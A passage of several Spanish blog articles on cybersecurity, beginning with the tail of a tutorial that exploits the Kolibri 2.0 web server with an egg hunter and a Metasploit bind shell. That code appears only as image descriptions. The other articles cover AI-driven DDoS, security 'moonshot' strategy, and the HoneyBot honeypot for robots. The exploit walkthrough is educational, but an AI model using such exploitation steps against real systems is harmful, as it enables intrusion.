tendríamos preparado el exploit, solamente hay que comprobar que funciona: [Imagen: Código del exploit Kolibri en Perl anotado explicando el egg hunter NTAccessCheckAndAuditAlarm] Y el resultado: FUNCIONA !!! [Imagen: Calculadora de Windows abierta y terminal con la respuesta HTTP 404 tras explotar Kolibri] Así que hemos dado con la forma de explotar la vulnerabilidad en el servidor web Kolibri v2.0. ¿Nos arriesgamos con una Shell? La generamos con Metasploit: Shell_bind_tcp en el puerto 4444 [Imagen: Terminal de Metasploit generando shellcode alfanumérico x86/alpha_mixed con msfpayload para una shell TCP] La copiamos a nuestro exploit: [Imagen: Editor gedit mostrando el shellcode del egg hunter para una shell en el puerto 4444] Lo ejecutamos y…. [Imagen: Explorador de Windows, panel de configuración de Kolibri WebServer y terminal con error HTTP 404] Shell al canto. [Imagen: Símbolo del sistema de Windows ejecutando telnet hacia la IP 10.0.3.15 por el puerto 4444] Nos conectamos para ver el resultado: [Imagen: Sesión telnet mostrando el listado de directorio de Kolibri-2.0-win con kolibri.exe y license.txt] Estamos en el directorio del servidor vulnerable. Pues nada, espero que os guste, yo me lo he pasado muy bien buscando y explotando la vulnerabilidad ;-) --- # Inteligencia Artificial utilizada en ataques DDOS URL: https://ciberseguridad.blog/inteligencia-artificial-utilizada-en-ataques-ddos/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-11-04 Actualizado: 2026-10-08 Tema: Vulnerabilidades y Ataques Informaticos > La Inteligencia Artificial en DDoS elimina completamente la participación humana, atacando múltiples vectores. ¡ Prepárate para el futuro ! La velocidad a la que ha evolucionado la ciberseguridad en la última década ha sorprendido a todos. Diferentes tipos de amenazas y métodos de ataque han estado apareciendo constantemente, atacando aplicaciones web a una velocidad alarmante. Desafortunadamente, los fundamentos del diseño de aplicaciones web no se establecieron teniendo en cuenta la seguridad. Por lo tanto, el diseño disperso y los servidores web continúan planteando desafíos a los profesionales de la ciberseguridad. Si no se aplican las medidas de seguridad correctas, las amenazas existentes que han existido durante años, infundirán el tiempo de inactividad de la aplicación y sus brechas de datos. Esta es la principal preocupación de los profesionales de la ciberseguridad. Si no podemos protegernos contra los ataques en las aplicaciones web de hoy, ¿cómo lucharemos contra las amenazas desconocidas del mañana? Los desafíos que vemos hoy en día se ven agravados por el uso de la Inteligencia Artificial (IA) por parte de los ciberdelincuentes. Los ciberdelincuentes ya tienen un extenso arsenal a su disposición, pero para empeorar las cosas, ahora tienen la capacidad de combinar sus conjuntos de herramientas existentes con el poder desconocido de la IA. Ver el vídeo en YouTube AI y Machine Learning (ML), creado para mejorar vidas, ahora se utiliza para ingresar en aplicaciones web. Este tipo de ataque automatizado basado en las máquinas, nunca se ha visto antes. El aumento de los ataques basados ​​en máquinas no es algo que deba abordarse en un futuro lejano, es un tipo de ataque que los profesionales de la seguridad debemos preparar desde hoy. Desde el primer día, los profesionales de la ciberseguridad deben defenderse contra este tipo desconocido de ataques, de una máquina lanzando ataques contra aplicaciones. ¿Cual es el punto más rápido y fácil para comenzar esta estrategia de defensa? La respuesta es; justo en el nivel de la aplicación web. ## ¿Qué es la inteligencia artificial? La inteligencia artificial es parte de una amplia rama de la informática, que implica la creación de sistemas que puedan funcionar de forma autónoma e independiente. El sistema más complejo conocido por el hombre es el cerebro humano, y en el pasado, los sistemas más poderosos no podían igualar su sofisticación. Su objetivo es crear "una mente" que piense exactamente de la misma manera que la mente humana. ¿La inteligencia de la raza humana será igualada por la inteligencia de una máquina? El campo de la IA se ha expandido rápidamente en los últimos años. Nadie sabe con precisión el efecto, por ejemplo, en las aplicaciones web una vez que los piratas informáticos lo tengan en sus manos con el fin de causar daño. ## Inteligencia Artificial en DDoS La inteligencia artificial combinada con DDoS está cambiando el juego y estamos empezando a ver el lanzamiento de ataques DDoS basados ​​en AI. Si las pilas de aplicaciones existentes y las infraestructuras subyacentes no son capaces de lidiar de manera eficiente con los DDoS existentes, ¿cómo podemos esperar que estas aplicaciones web soporten un tipo de ataque DDoS automatizado basado en máquinas mejoradas y autónomas? Antes de abordar algunas de las soluciones inmediatas, debemos proteger las aplicaciones web. Por lo tanto, examinemos primero la evolución de los DDoS y la rapidez con la que ha evolucionado pasando del atacante humano a un atacante basado en máquinas. ## La evolución de DDoS [Imagen: Gráfico de Netscout Arbor mostrando el crecimiento del tamaño máximo de ataques DDoS hasta 1.7 Tbps] A principios de la década de 2000, se creaban scripts de shell simples para eliminar una sola página web. Por lo general, se utilizaba una firma de ataque de una sola dirección IP de origen. Esto se conoció como un ataque clásico basado en Bot, que fue efectivo para eliminar una sola página web. Sin embargo, este tipo de amenaza necesitaba un humano para lanzar cada ataque individual. Por ejemplo, si deseábamos detener diez aplicaciones web, deberíamos presionar "enter" en el teclado diez veces. Entonces se empezó a encontrar scripts simples compilados con bucles. Bajo este ataque mejorado, en lugar de teclear cada vez que se quería cerrar una página web, este actor simplemente agregaría un bucle al script. El ataque todavía usaba solo una dirección IP de origen y era conocido como la denegación de servicio clásica (DoS). Así, el juego del gato y el ratón continuó entre los desarrolladores de aplicaciones web y "los malos". Los parches fueron lanzados rápidamente. Se aplicaron parches a la aplicación web y los servidores web a tiempo, y mientras existiera un buen diseño, se podría evitar este tipo de ataques conocidos. Finalmente, los atacantes comenzaron a distribuir utilizando múltiples fuentes para lanzar el ataque creando una superficie más grande. Esto se conocía como denegación de servicio distribuido (DDoS). La propagación de malware desde el enfoque manual a un enfoque automático complicó aún más las cosas. La propagación automática de malware fue una evolución importante en DDoS. Ahora, los ataques de múltiples fuentes podrían propagarse automáticamente sin intervención humana. Fue cuando se comenzó a presenciar ataques automatizados que golpeaban las aplicaciones web con una variedad de tipos de vulnerabilidades. Los atacantes utilizaron lo que se conocía como servidores de Comand and Control (C&C) para controlar los bots comprometidos. Los servidores de C&C podrían cambiar los vectores de ataque aleatoriamente, por ejemplo, una inundación del protocolo de datagramas de usuario (UDP) a una inundación del protocolo de mensajes de control de Internet (ICMP) o si eso no funcionaba, un ser humano podría intervenir y configurar el C&C para apuntar más arriba en la pila de aplicaciones (Buffer Overflow). Muchos ataques volumétricos se combinaron con ataques basados ​​en aplicaciones. Los ataques volumétricos golpearon las puertas de la red, lo que provocó un pánico en los equipos de seguridad. Nadie estaba realmente listo para los ataques DDoS. Sin embargo, mientras el ataque DDoS volumétrico de miles de fuentes está llenando los conductos de la red, el ataque más serio basado en la aplicación está bajo el radar, comprometiendo así las valiosas aplicaciones web. Los ataques volumétricos se pueden combatir de varias maneras y, por lo general, se usan como humo para encubrir un ataque a la aplicación más peligroso. La introducción de 'ataques por debajo del radar' fue conocida como un ataque de estilo bajo y lento. Un sistema estándar de Firewall o sistema de detección de intrusos (IDS) no está diseñado para capturar este tipo de ataques. Salen completamente fuera del radar de todos los mecanismos de defensa tradicionales. Además, si no se implementa la seguridad de la aplicación correctamente, los ataques podrían pasar desapercibidos durante meses con la aparición de exfiltración de datos. ## El auge de la inteligencia artificial en DDoS Se produjo la propagación automática del malware y los tipos de vulnerabilidad cambiantes a través de los servidores de C&C, pero aún así, hubo una limitación. Esta limitación fue la necesidad de la intervención humana. El auge de la IA en DDoS despliega una nueva era de ataques que no requiere presencia humana. Hemos entrado en un nuevo mundo de criminalidad cibernética en el que solo sobrevivirán las aplicaciones web más difíciles y mejor diseñadas. AI DDoS elimina completamente la participación humana. Ahora, tenemos máquinas que atacan aplicaciones.Están completamente automatizados, cambiando los tipos de vulnerabilidad y atacando vectores basados ​​en la respuesta del lado de la defensa. Si una firma atacante no funciona, la máquina piensa por sí misma y puede cambiar a una firma diferente. Todo hecho automáticamente, sin intervención humana. ## ¿Cómo nos preparamos? La forma más rápida de prepararse para esto ahora es endurecer adecuadamente la pila de aplicaciones al máximo de su capacidad, mientras mantenemos los falsos positivos y negativos a la tasa más baja posible. Para una seguridad efectiva de la aplicación web, necesitamos mecanismos para garantizar un bajo número de falsos positivos mientras se escanea con precisión la aplicación web para detectar los ataques aleatorios que una máquina puede lanzar. ## ¿Cómo nos preparamos? La aplicación web es una barrera de entrada para un ataque basado en AI. Las pruebas de seguridad de aplicaciones web tradicionales que se basan en las pruebas de caja negra, no ayudan de ninguna manera. La prueba de caja negra simula el enfoque de un atacante real y la aplicación se prueba desde el exterior hacia adentro sin ningún conocimiento de la estructura interna o la arquitectura de la aplicación. Sin embargo, ahora el atacante no es un humano, es una máquina. Más potente y más peligroso. La prueba de caja negra no controlará cómo se comporta el código durante la ejecución, y el análisis del código fuente no siempre entenderá qué sucede cuando el código está en ejecución. Por sí mismo, no ofrece mucha ayuda en la preparación para un ataque de aplicación basado en IA que está cambiando los vectores y los tipos de vulnerabilidad de forma aleatoria. Se requiere una combinación de pruebas tanto de caja negra como de caja blanca para mantener los falsos positivos en una tasa baja. Como una máquina basada en la IA está afectando a su aplicación con parámetros de ataque que cambian automáticamente, las nuevas tecnologías nos puede ayudar a mantener a nuestro equipo calmado con la reducción de las tasas de falsos positivos y falsos negativos a una tasa más baja. Para defendernos de un ataque automatizado basado en máquinas, los profesionales de la ciberseguridad deben responder con un mecanismo de defensa automatizado. Los resultados del escaneo de vulnerabilidades, eliminan la necesidad de confirmar manualmente las vulnerabilidades detectadas, lo que hace que la aplicación web se encuentre en el camino correcto para protegerse contra los ataques basados ​​en AI. Teniendo en cuenta el hecho de que el lado atacante se encuentra en una era totalmente automatizada, las pruebas de vulnerabilidad web también deberían convertirse en un proceso automatizado. ## Conclusión Desde la última década, hemos sido testigos de ataques DDoS que van desde secuencias de comandos simples con vectores individuales hasta ahora, con ataques totalmente automatizado basados en el poder de la IA cuyo poder reside en la mecanización. El atacante que se base en la IA irá a por las aplicaciones web, ya que son más fáciles de comprometer. ¿Cómo debemos actuar?, Mantener los falsos negativos y falsos positivos a una tasa baja, mientras que también se escanéa con precisión las vulnerabilidades como paso inmediato y esencial a tomar como requisito desde ya, contra el futuro desconocido del uso de Inteligencia Artificial por parte de los ciberatacantes. --- # Moonshot en ciberseguridad URL: https://ciberseguridad.blog/moonshot-en-ciberseguridad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-10-21 Actualizado: 2026-09-29 Tema: Operaciones de Seguridad > Con un liderazgo enfocado, la adopción de las prácticas tecnológicas correctas, unido al poder de la IA y el Machine Learning combinados, los Moonshot en ciberseguridad tendrán éxito, llegando a lograr un verdadero estado de resistencia cibernética. El mundo está experimentando una revolución digital. Una que está cambiando fundamentalmente la forma en que experimentamos nuestras vidas, en formas que aún no hemos entendido realmente. A medida que nuestras comunicaciones e interacciones personales y profesionales se han movido en línea, también lo ha hecho una amplia gama de amenazas. Los ciberdelincuente, ciberterroristas y los estados nacionales adversarios han superado las defensas de ciberseguridad de las naciones. ## Es tiempo para los mooshot en ciberseguridad El 25 de mayo de 1961, el presidente John.F. Kennedy pronunció su histórico discurso "Moonshot" en el Congreso. > "Ahora es el momento de dar pasos más largos" - Kennedy > "Momento para que esta nación tome un papel claramente destacado en el logro del espacio, que en muchos aspectos puede ser la clave de nuestra futuro en la tierra " - Kennedy Posteriormente desafió a la NASA y a la nación a una tarea aparentemente inimaginable: poner un hombre en la luna. En ese momento, los Estados Unidos poseían el conocimiento tecnológico para lograr un aterrizaje lunar. Lo que le faltaba era una visión para aprovechar su destreza tecnológica para lograr un resultado dramático y tangible. Tres factores fueron esenciales para el éxito: 1. Liderazgo concertado para impulsar una innovación sin precedentes. 2. Una llamada a la acción específica que encienda una colaboración sin paralelo en los sectores público y privado 3. Una inversión sostenida asegurando el éxito continuo. La Era Digital ha revolucionado los negocios tanto en el sector público como en el privado, y en este entorno, las operaciones digitales y de datos son nuestra moneda. Para lograr el éxito, necesitamos nuevos y audaces enfoques para abordar las vulnerabilidades que enfrentamos hoy y superar los desafíos que enfrentaremos mañana, como por ejemplo protegernos de las vulnerabilidades venideras del Internet de las cosas (IoT). Es hora de ser más intencional acerca de los productos y servicios cibernéticos y de actuar de manera enfocada. Los costos económicos y de seguridad de no actuar con decisión son simplemente demasiado altos. Estamos preparados y debemos empezar ya. La ciberseguridad cuenta con la suficiente madurez como para empezar a soñar. Como dijo Kennedy , "Ahora es el momento de dar pasos más largos". Momento para que las naciones tomen un papel claramente destacado en el logro del "cyber"espacio, aspectos que serán la clave del futuro de las naciones en cuanto a ciberseguridad se trata. ## Convirtiendose en ciberresilientes La llamada a realizar Moonshot de ciberseguridad es una llamada a la verdadera resistencia cibernética. Debemos asumir que nuestros sistemas, información y procesos están bajo continua amenaza de compromiso y debemos diseñarlos para que sean tolerantes a los fallos. Al hacer eso, podemos crear un nivel de confianza online de base que no vacile cuando se produzca un evento inesperado y estemos preparados con un plan sistemático. Cuando logramos esto: - El gobierno, las empresas y los ciudadanos operarán sin temor a pérdidas, compromisos o daños. - La innovación continua en servicios al ciudadano continuará creandose - Trabajaremos sobre una base segura y resistente. - La información necesaria para asegurar los gobiernos será accesible solo para los usuarios adecuados. ## Liderazgo y tecnología Todo comienza con el liderazgo. En todos los gobierno, los esfuerzos en ciberseguridad están fracturados. En Estados Unidos, si comparamos el gobierno con las 17 principales industrias privadas, las distintas agencias se ubican en el tercer lugar más bajo en cuando ciberseguridad. Para que un los Moonshot en ciberseguridad funcionen, se debe establecer una unidad de acción. Las administraciones públicas y las empresas privadas deberían tener la ventaja de beneficiarse de la inteligencia en ciberseguridad y las lecciones aprendidas, ya que con el ciberespacio emergiendo como el próximo "campo de batalla", son necesarios enfoques más estratégicos y productivos. ### Cuatro ideas a considerar de los moonshot en ciberseguridad 1. Crea un nuevo rol de ciberseguridad con la autoridad para dirigir y supervisar la estrategia en ciberseguridad. Esta posición podría ser apoyada por una nueva "Junta de ciberseguridad" que supervise, para garantizar que los cambios se aborden de manera agresiva. 2. Crear un departamento único que tenga la responsabilidad autorizada de ciberseguridad. 3. Actua decisivamente para cerrar la brecha entre los sectores público y privado. Debemos reconocer que la infraestructura crítica se extiende hacia y a través del sector privado, ejecutar compromisos reales, asegurar un compromiso constante y aprovechar las autoridades y recursos. Tal vez incluso establecer una corporación cuasi pública para combinar la velocidad del sector privado con la autoridad y los recursos del gobierno. 4. Aborda la ciberseguridad desde el principio, garantizando un acceso sólido a la educación STEM , a las carreras y la formación en ciberseguridad. Debemos reconsiderar lo que significa desplegar una fuerza laboral en ciberseguridad, más allá de los actuales grados de cuatro años. ## Construyendo la empresa ciberresiliente Debemos establecer una base cibernética fuerte, una que desvíe el equilibrio de poder de nuestros adversarios e incline la escala a nuestro favor. Para ello, hay cinco pasos esenciales en lo que a Moonshot de ciberseguridad se trata: 1. Adopta la cloud en ciberseguridad: Aprovecha la cloud habilitando características de la tecnología de forma que puedas eliminar vulnerabilidades, crear una barrera más defendible, posibilita una ciberseguridad más dinámica. El uso de la cloud para mejorar la seguridad nos permitirá limitar significativamente nuestra exposición a los riesgos cibernéticos. 2. Participar en la defensa proactiva: Pasar de un enfoque reactivo a uno proactivo en la ciberseguridad. EMpieza a cazar, investiga y elimina peligros en las amenazas persistentes avanzadas (APT), antes de que el adversario pueda explotarlos. Aplicar machine learning y inteligencia artificial para automatizar la detección y su respuesta. 3. Exije un enfoque centrado en los datos: Endurecer los sistemas de adentro hacia afuera mediante el cifrado y el anonimato de los datos para minimizar la potencial pérdida si entra un adversario. Esto comienza con la priorización de los activos de datos más importantes, "las joyas de la corona", dedicando los recursos necesarios para asegurarlos. 4. Requerir seguridad por diseño: La seguridad ya no debe verse como un ejercicio de cumplimiento posterior que resulte en costes adicionales. El diseñado debe ser el núcleo de cada sistema desde el primer momento. Las administraciones públicas y empresas deben adoptar un enfoque más ágil de la seguridad durante el proceso de desarrollo que lleve a todos los profesionales a un alto nivel de competencia en seguridad en un corto período de tiempo, garantizando las necesidades de seguridad . Los sistemas requieren una continua higiene en ciberseguridad. 5. Ciberresiliencia incorporada: Aprovechar las capacidades avanzadas de la computación y el almacenamiento definidos por software para crear sistemas ciberresilientes. Un objetivo en movimiento es difícil de alcanzar, y si no pueden encontrarte, no pueden atacarte. ## Dos grandes desafios en los moonshot de ciberseguridad Más allá de un liderazgo fuerte y el establecimiento de una postura de tecnología cibernética avanzada, los Moonshot de ciberseguridad deben abordar el inmenso desafío de asegurar el creciente paisaje en IoT. Lo que estamos haciendo hoy simplemente no funcionará en un futuro cercano. La gran cantidad de dispositivos IoT hará que el control y la supervisión humanos sean imposibles, lo que significa que debemos buscar soluciones de seguridad que detecten y respondan a las amenazas a la velocidad de las máquinas. La inteligencia artificial y el machine learning cumplirán este rol fundamental al permitir el uso seguro de las capacidades de IoT. Para el 2020, más de 34 mil millones de dispositivos estarán conectados a una plataforma u otro dispositivo y con más del 90 por ciento de las personas que actualmente usan tres o más dispositivos, el flujo de datos que lo acompaña, a menudo altamente sensible, continuará creciendo. ### La inteligencia Artificial es esencial para los moonshot en ciberseguridad La IA y el machine learning ofrecen nuevas posibilidades. Cuando se combina con Cloud, la inteligencia artificial puede ayudarnos a escalar nuestros esfuerzos en ciberseguridad a través de la automatización inteligente y el aprendizaje continuo de los sistemas de recuperación automática. El proceso de aprendizaje también ayuda a detectar vulnerabilidades. Con el tiempo, a los profesionales de la ciberseguridad se les puede enseñar los puntos más técnicos del aprendizaje automático, de modo que se pueda aumentar el aprendizaje automático y el procesado de algoritmos con controles humanos y verificaciones que reduzcan el riesgo de falsos positivos. Los beneficios adicionales de usar Machine Learning para asegurar el ecosistema IoT incluye: - Dibujar patrones y tendencias interesantes a partir de vastas cantidades de datos - Desarrollar modelos de seguridad más predictivos. - Aprendizaje continuo de datos sin reprogramar máquinas. - Detectar instantáneamente comportamientos anómalos y responder proactivamente. ## De los Moonshot a la realidad. Conclusiones Tenemos los recursos y el ingenio para hacer que las redes digitales sean más seguras y robustas. Con un liderazgo enfocado, la adopción de las prácticas tecnológicas correctas, unido al poder de la IA y el Machine Learning combinados, los Moonshot en ciberseguridad tendrán éxito, llegando a lograr un verdadero estado de resistencia cibernética. > “Elegimos hacer ... no porque sea fácil, sino porque es difícil; porque este objetivo servirá para organizar y medir lo mejor de nuestras energías y habilidades, porque ese desafío que estamos dispuestos a aceptar, por un lado, no estamos dispuestos a posponer y por otro, que tenemos la intención de ganar ". - Kennedy ### ¿Que podemos hacer desde ya? El camino a seguir puede ser ligeramente diferente dependiendo de dónde nos encontremos. Hay algunas cosas clave que podemos hacer en este momento para comenzar a cambiar el equilibrio de poder a nuestro favor: 1. Mejora de inmediato la higiene en ciberseguridad básica para garantizar que los sistemas estén parcheados y actualizados. 2. Acelerar la migración a la Cloud por motivos de seguridad 3. Identifica las "joyas de la corona" y céntrate en asegurar esos sistemas al adoptar un enfoque de seguridad centrado en los datos para minimizar el potencial de pérdida. 4. Adopta procesos DevSecOps, que reúnan la modernización TI y la inversión en ciberseguridad, para garantizen que las necesidades empresariales de TI y ciberseguridad se aborden de manera coherente. 5. Adopta medidas de defensa proactivas efectivas y probadas (hunting, red-teaming, penetration testing) para erradicar APTs, cerrar los agujeros y construir una postura de defensa más capaz y endurecida. 6. Promueve una mentalidad "Security First" donde la ciberseguridad sea vista como responsabilidad de todos Y que mejor forma de hablar "de los Moonshot a la realidad" que tratar y listar los unicornios en ciberseguridad , empresas pioneras en temas de seguridad, caracterizadas en muchos casos por disponer de tecnología nueva, que hasta ellos, carecia de sentido, con una alta dosis de imaginación y creatividad. - Tanium: Es una empresa privada de gestión de sistemas y seguridad de endpoint. El único punto de administración de Tanium está diseñado para ayudar a los equipos de IT a manejar el cambio y la interrupción. Tanium reduce la fragmentación y complejidad creadas por años de compras de soluciones puntuales. - CrowdStrike: Es un proveedor de protección endpoints entregados en cloud. Aprovechando la inteligencia artificial (AI), la plataforma CrowdStrike Falcon ofrece visibilidad y protección instantáneas en toda la empresa y evita ataques en puntos finales dentro o fuera de la red. CrowdStrike Falcon se despliega en minutos para ofrecer inteligencia accionable y protección en tiempo real desde el primer día. Unifica a la perfección el AV de próxima generación con la mejor detección y respuesta, respaldado por la "caza" administrada 24/7. - CloudFlare: Protege las aplicaciones de Internet contra ataques sin necesidad de agregar hardware, instalar software o cambiar el código. Su red global permite a las empresas implementar firewall basado en cloud, balanceadores de carga, optimización WAN, mitigación de denegación de servicio distribuido (DDoS), entrega de contenido y servicios DNS. (Yo soy muy fan de Cloudflare, y por ello lo usamos en Ciberseguridad .blog) - Lookout: anteriormente, Flexilis, es una empresa de seguridad para smartphones, dedicada a hacer que la experiencia móvil sea segura para todos, protegiendo a los usuarios de virus, malware y spyware, capacidad de hacer copias de seguridad y restaurar datos, y herramientas para ayudar a localizar teléfonos perdidos o robados. Las aplicaciones conectadas en la plataforma de Lookout, conectados en cloud, están diseñadas para ser livianas y eficientes, a la vez que brindan la mejor protección posible. La red de amenazas móviles de la compañía escanea aplicaciones en todo el mundo, lo que permite encontrar y detener amenazas a nivel y con IoCs a nivel mundial. - Illumio: Especialista en la microsegmentación y la prevención de la propagación de amenazas de ciberseguridad dentro de Datacenters y entornos Cloud. La Adaptive Security Platform de Illumio protege de manera única la información crítica con el mapeo de dependencias de aplicaciones en tiempo real y la microsegmentación que funciona en cualquier centro de datos, cloud pública o en implementaciones híbridas en entornos metalizados, virtualización y contenedores. - Cylance: Aplica algoritmos de inteligencia artificial para identificar y detener de manera predecible el malware y las amenazas avanzadas. Cylance identifica de forma rápida y precisa lo que es seguro y lo que es una amenaza, expandiéndose más allá de lo que está en una lista negra o lista blanca. Al unir las matemáticas sofisticadas y el Machine Learning (Hemos hablasdo a lo largo del post de ello) con una comprensión única de la mentalidad de un pirata informático, Cylance proporciona la tecnología y los servicios que son predictivos y preventivos contra amenazas avanzadas. (APTs) - Tongdun Technology : Anteriormente FraudMetrix, ofrece servicios de control de riesgos antirrobo y antifraude basados en grandes datos a más de 3,000 firmas de servicios financieros, compañías de seguros, plataformas de pago online de terceros, comercio electrónico y plataformas de redes sociales. . --- # HoneyBot, El Honeypots para sistemas robóticos URL: https://ciberseguridad.blog/honeybot-honeypots-para-sistemas-roboticos/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-09-30 Actualizado: 2026-10-04 Tema: Internet de las cosas > Son cada vez más los tipos de sistemas a hacer frente en ciberseguridad, y esta vez, trataremos la ciberseguridad en robot, mediante honeypots. ¡ ENTRA ! Con la prevalencia de la robótica creciendo en todas las facetas de la vida cotidiana, los robots se están convirtiendo en una parte más crucial de nuestro ecosistema. Contamos con ellos para fines militares en el frente de guerra, dependemos de ellos para ayudar a los médicos en la industria de la salud, e incluso son los primeros en responder y la policía los utilizan. Esta no es una lista exhaustiva y si no tomamos medidas para protegerlos, se convertirán en serias amenazas de seguridad. En ciberseguridad, el primer paso para asegurar un recurso es tradicionalmente el desarrollo de un modelo de amenaza. Un modelo de amenaza puede ayudar a evaluar la probabilidad y el daño potencial, lo que puede ser útil para minimizar o erradicar la amenaza. Históricamente, la ciberseguridad en robótica no ha sido una preocupación eminente, por lo que para determinar un modelo de amenaza válido, estos sistemas deben ser estudiados y monitorizados para conocer el alcance de los ataques que podrían afectarles. Esto podría lograrse con un honeypot especialmente diseñado para sistemas robóticos. Desde su inicio, los honeypots se han enfocado principalmente en el dominio de informática tradicional, que busca monitorizar a los atacantes que pretenden comprometer las estaciones de trabajo y servidores de la empresa. La primera honeynet (una red de honeypots) para CPS (Cyber Physical Systems) / SCADA (Control de supervisión y adquisición de datos) fue creada por Venkat Pothamsetty y Matthew Franz del Grupo de garantía de infraestructura de Cisco (CIAG) en 2004. El objetivo era simular unos pocos servicios populares de PLC (Controlador Lógico Programable) para ayudar a los investigadores a comprender mejor los riesgos de los dispositivos del sistema de control expuesto. Este trabajo ha sentado las bases para muchos otros honeypots de CPS, ninguno de los cuales es directamente aplicable al dominio de la robótica. Con la prevalencia de los sistemas robóticos en aumento, es fundamental que las técnicas avanzadas de monitorización, como los honeypots, se amplíen para defenderlos. La evasión de Honeypot es, como en la mayoría de la ciberseguridad, el juego del gato y el ratón. Casi siempre existen huellas de configuración para cualquier honeypot, y se corrigen cuando los atacantes las descubren y los defensores mejoran. Una forma de detectar honeypots arbitrarios es observar el rol de una máquina en una red. Los Honeypots son, por definición, solo interactuados por los atacantes. Si las máquinas en una red no intercambian tráfico con los hosts que las rodean, y parece que los usuarios normales no las utilizan, es obvio que la máquina es un honeypot. El HoneyBot intenta abordar estas preocupaciones para los sistemas robóticos. En primer lugar, el sistema robótico existe y está en uso, lo que remedia la tradicional falta de contexto. En segundo lugar, no está virtualizado, sino implementado en hardware real. Finalmente, el sistema robótico implementa por completo los servicios presentados, por lo que todas las respuestas del sistema están en línea con los dispositivos HoneyBot. El HoneyBot es el primer honeypot de interacción híbrida de software específicamente diseñado para sistemas robóticos en red. Al simular acciones inseguras y realizar acciones seguras físicamente en el HoneyBot, tratamos de engañar a los atacantes para que crean que sus hazañas son exitosas, al mismo tiempo que registramos todas las comunicaciones para usarlas en la atribución y la creación del modelo de amenaza. ## Ciberseguridad en robótica El campo de la robótica siempre está cambiando, pero los componentes que unen a casi todas las clases de robots son sensores, actuadores y controladores. Los sensores son los ojos y oídos del robot. Permiten que el robot comprenda el mundo que lo rodea y juzgue las características del entorno. El HoneyBot debe ser capaz de "simular", a través de la simulación, cualquier valor de sensor que el robot produzca, de forma que un atacante no sepa que los comandos no se ejecutan en realidad. Para hacer esto, se han desarrollado modelos de dispositivos que proporcionan respuestas de sistema realistas con una entrada "insegura / indeterminada" por parte de un atacante. El siguiente componente común a cada clase de robots son los actuadores. Los actuadores permiten que el robot modifique el entorno y se mueva o actúe. La implementación de HoneyBot vive en un robot que opera en entornos de red y los usuarios / atacantes no tienen acceso físico o visual. En su lugar, enfatiza la simulación precisa del momento de las respuestas del sistema y cómo los comandos del usuario cambiarán el estado del sistema global. El tercer componente de un robot, y posiblemente el más importante, es el sistema de control o controlador. El controlador, también conocido como el cerebro del robot, permite al robot analizar comandos, enviar señales a diferentes dispositivos y comunicarse con otros robots además del usuario. El HoneyBot es un software que vivirá en el controlador del robot para que pueda acceder fácilmente a todos los comandos de datos y señales hacia y desde el cerebro del robot, lo que le permite tomar decisiones de forma consecuente. Un usuario / atacante se conecta de forma remota al sistema robótico en red a través de Internet y puede enviar comandos. Todos los comandos recibidos por el robot se registrarán y pasarán al módulo de verificación de entrada, que, como se indicó anteriormente, es flexible en su estructura y puede ser muy completo en la evaluación de comandos o relajar según las necesidades de la aplicación. Si el módulo de verificación de entrada considera que un comando es seguro, la acción se realizará de la forma habitual y la respuesta del sistema se devolverá al usuario / atacante. Si, por otro lado, el módulo de verificación de entrada considera que un comando no es seguro, el comando se simulará en tiempo real y se generará y se devolverá la respuesta del sistema "fake". [Imagen: arquitectura-honeybot] ## Honeypot para sistemas robóticos Dada la creciente cantidad de programas maliciosos dirigidos a CPS que se encuentran, algunos comienzan a señalar que los sistemas de control industrial son la nueva frontera para los ciberataques. En el pasado, los honeypots de CPS se diseñaron para imitar componentes de CPS específicos en una red para proteger los recursos. Sin embargo, la mayoría de los honeypots existentes de CPS descuidan ciertos aspectos de estos sistemas que pueden alertar a un atacante sobre la naturaleza del honeypot, es decir, la física de los dispositivos que interactúan con el proceso. Es por eso que HoneyBot se basa en trabajos anteriores, como HoneyPhy. HoneyPhy es un marco de honeypot sensible a la física que modela con precisión las huellas dactilares de software y los protocolos que luego se utilizan para simular el CPS y engañar a los atacantes que acceden al honeypot. El framework HoneyPhy se compone de tres módulos principales: 1. la interfaz de Internet 2. Modelo de proceso 3. módulos del modelo de dispositivo. Tal como se aplica al HoneyBot, el Módulo de Interfaz de Internet se utiliza para abrir puertos o interfaces en el sistema robótico de modo que se pueda conectar a una red. En otras palabras, la interfaz de Internet es la interfaz del usuario, la interfaz que el atacante puede ver. El Modelo de proceso se activa con un comando "inseguro" o "indeterminado", y la acción se simulará en tiempo real al consultar el modelo de dispositivo apropiado en lugar de enviarse para que se realice determinísticamente en el robot. El Modelo de Dispositivo es diferente de los otros módulos ya que contiene un modelo representativo de cada dispositivo que se encuentra dentro de un robot. Estos modelos están construidos a partir de datos reales recopilados de un dispositivo determinado. ## Experimentación de los modelos Para el desarrollo del modelo, se debe utilizar una combinación de técnicas que incluyen experimentación y modelado de procesos físicos para simular el comportamiento del dispositivo. Los modelos creados se consultan en tiempo de ejecución para generar respuestas "falsas" que se envían a los atacantes cuando realizan acciones maliciosas o inseguras. Supongamos que el HoneyBot se implementó en un dron militar utilizado para encontrar IED (dispositivos explosivos improvisados) y recibió un comando que lo ordena pasar por una zona de exclusión aérea. Claramente, hay algo sospechoso, por lo que el módulo de verificación de entrada marca la acción como insegura. Luego, el dron consulta su modelo de dispositivo GPS y devuelve las coordenadas falsas, manteniendo su posición en un área no restringida, pero haciendo que el usuario crea que está en otra parte. Los modelos de dispositivo no solo deben proporcionar datos realistas con conciencia del estado, sino que también deben reflejar la correlación entre los sensores. Por ejemplo, un sensor de distancia debe corroborar los datos de velocidad informados, y los datos de velocidad deben estar en línea con las lecturas del codificador. ## Conclusiones HoneyBot es el primer honeypot para sistemas robóticos. Los honeypots existentes no pueden engañar a los atacantes inteligentes porque no modelan con precisión la física de los dispositivos. HoneyBot soluciona esto aprovechando HoneyPhy y las técnicas de los honeypots tradicionales. Los modelos de dispositivos se construyeron para sensores robóticos comunes y se les solicitó que proporcionen actualizaciones y respuestas convincentes del estado del sistema. Al simular acciones inseguras y realizar físicamente acciones seguras en HonbeyBot, podemos engañar a los atacantes para que crean que sus ataques son exitosos, al mismo tiempo que registramos todas las comunicaciones que se utilizarán para la atribución y la creación del modelo de amenaza. El HoneyBot es un honeypot de interacción híbrido específicamente diseñado para sistemas de robots y debería ser el estándar de facto para la seguridad de los robots a medida que la prevalencia de robots crezca en la sociedad. --- # Las mejores herramientas hacking URL: https://ciberseguridad.blog/las-mejores-herramientas-hacking/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-09-16 Actualizado: 